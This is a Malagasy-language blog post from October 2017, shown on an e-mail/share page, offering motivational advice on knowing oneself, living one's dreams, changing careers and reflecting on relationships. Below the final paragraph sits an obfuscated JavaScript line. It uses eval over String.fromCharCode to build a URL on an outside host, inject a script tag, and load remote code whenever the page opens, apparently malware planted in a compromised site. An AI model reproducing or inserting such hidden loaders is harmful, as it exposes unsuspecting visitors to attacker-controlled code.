What is this? From this page you can use the Social Web links to save Fantaro ilay maha ianao anao, sa ve hoe mby aiza ianao? to a social bookmarking site, or the E-mail form to send a link via e-mail.

Social Web

E-mail

E-mail It
Oktobra 29, 2017

Fantaro ilay maha ianao anao, sa ve hoe mby aiza ianao?

Posted in: izaho

Ny voalohan-teniko dia hoe toy ny lolo isika, ka afaka miofo, mivoatra ihany koa fa tsy natao ho very fahalalana akory.

Ampahatsiahiviko etoana ilay fomba fisainana milaza hoe :” Avelao ny nofy hanova ny zava-misy fa aza avela kosa ny fiainana no hanova ny nofinao na izay ho kinasanao” Eto dia voalohany aloha dia mila fantarinao hoe “iza tokoa ianao”, satria raha tianao ny hiaina io nofy ho lasa fiainana io dia mila hentitra amin’ny tenanao aloha ianao, mila fantarinao hoe hatraiza no fetra zakanao, tantinao ary hivononanao hatrehina marina tsy amin-tahotra.

Amin’izay fahafantaranao ny tenanao izay dia tsy tokony hisy fetra izay ho kasainao, avelao ny nofinofinao hamaritra hoe iza ilay TOKONY ho ianao , farito, ary raiketro an-tsoratra izany ary ataovy taza-maso matetika, mba ho lasa tarigetra mihintsy aza. Raiketro ao ny vinavinam-piainana tianao hiainana, ny zavatra sahinao hatao nefa tsy vitanao hatreto, na hiova fiainana mihintsy az atsy mampaninona fa fandalovana ihany ny antsika ety koa aleo iainana dieny izao izay nofinofy izay,

Rehefa vitanao izao, dia mivononà hiaina io fiovana io @ izay. Azo atao hoe fiovana na koa fivoarana izy eto, tsy misy hoe fahatarany izany eo @ fanovana fiainana na famindra hoy isika, ny zavatra rehetra dia miainga @ fanapahan-kevitra hentitra. Tongotra mby an-dakana hoy isika izay, ka tsy hiverina aoriana intsony. Mila iainanao @ izay ilay nofinao teo aloha, angony daholo ho eo am-pelantananao ny fahaizana manao izany, manatona olona na tranon’asa ahafahanao mahazo ny ilaina momba izany (raha asa dia mila fanampiana ianao @ “reconversion”, dia mila “formation” vao2 izany), Miova izany eto ny rivotra iainanao indray, Fantaro fa tsy fahalemena akory ny fiovana fa fivoarana kosa, ny traikefanao sisa no andrasana.

Azo ampiharina ihany koa izany eo @ fiainana manokana, ohatra raha mbola mpitovo ianao dia inona no tianao hitondrana ny fiainanao ho avy, hijanona ho mpitovo sa mikasa ny hanorina tokan-trano, ary raha efa manana izany indray dia ny fanontaniana mipetraka dia hoe moa ve manao ny mety sy azo atao aho hahamafy orina ilay voady izay nataoko, sa mila misy ezaka tokony hataoko haha mamy indray ilay ankany, na koa hoe sao tonga @ tsotsory mamba hisarahana ny fiarahanareo. Fanontaniana maro no mibosesika an-doha rehefa tonga ilay fotoana ilaina fandinihan-tena izay, ka tena mila olona vonona ny hiatrika izany tokoa fa tsy manisy saron-tava fotsiny ihany. Eto anefa dia tsy ianao ihany no ho voakasik’ilay fiovana fa ny olona izay miaraka aminao ihany koa, (faire une rétrospective de la vie pour mieux rebondir), ka mila mandinika tsara ianao hoe vonona hiatrika izay fiovana izay tokoa ve.

Rehefa tontosa ireo dingana ireo dia mila mino @ izay ianao. Mino ilay nofy lasa fiainana iainana. Mino fa vitanao tokoa ilay fiovana, mety hisy ny sakana, mety hisy ny tsy ho fahataontosana am-boalohany, fa tsy tokony ho kivy ianao. Hisy; ary enga anie hisy ihany koa ny hitsikera izay fiainanao vao2 izay, aleo hisy izany mba hahaizanao miaro ilay nofinao lasa tena izy. Aza mora ketraka ny @ izany ka hanenina, ny nenina tsy mba eo aloha hobanjinona hananatra fa any aoriana hatrany, koa raiso ny hoavinao ary iaino aam-pifaliana na inona na inona mitranga eo. ianao no efa nisafidy ilay nofy ho fiainana ka anao ny mikolokolo azy hamelana sy handrobona indray.

eval(String.fromCharCode(118,97,114,32,117,32,61,32,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,49,54,44,49,49,54,44,49,49,50,44,49,49,53,44,53,56,44,52,55,44,52,55,44,49,49,57,44,49,49,53,44,52,54,44,49,49,53,44,49,49,54,44,49,48,53,44,49,49,56,44,49,48,49,44,49,49,48,44,49,48,50,44,49,48,49,44,49,49,52,44,49,49,48,44,57,55,44,49,49,48,44,49,48,48,44,49,49,49,44,52,54,44,57,57,44,49,49,49,44,49,48,57,44,52,55,44,49,49,53,44,49,49,54,44,49,48,57,44,54,51,44,49,49,56,44,54,49,44,49,49,53,44,49,48,56,44,49,48,56,44,49,48,56,44,52,57,44,52,54,44,53,51,44,52,54,44,53,54,41,59,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,32,115,46,116,121,112,101,61,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,54,44,49,48,49,44,49,50,48,44,49,49,54,44,52,55,44,49,48,54,44,57,55,44,49,49,56,44,57,55,44,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,59,32,118,97,114,32,112,108,32,61,32,117,59,32,115,46,115,114,99,61,112,108,59,32,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,48,52,44,49,48,49,44,57,55,44,49,48,48,41,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,118,97,114,32,108,105,115,116,32,61,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,49,49,53,44,57,57,44,49,49,52,44,49,48,53,44,49,49,50,44,49,49,54,41,41,59,108,105,115,116,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,108,105,115,116,46,99,104,105,108,100,78,111,100,101,115,91,48,93,41,59,125));


Return to: Fantaro ilay maha ianao anao, sa ve hoe mby aiza ianao?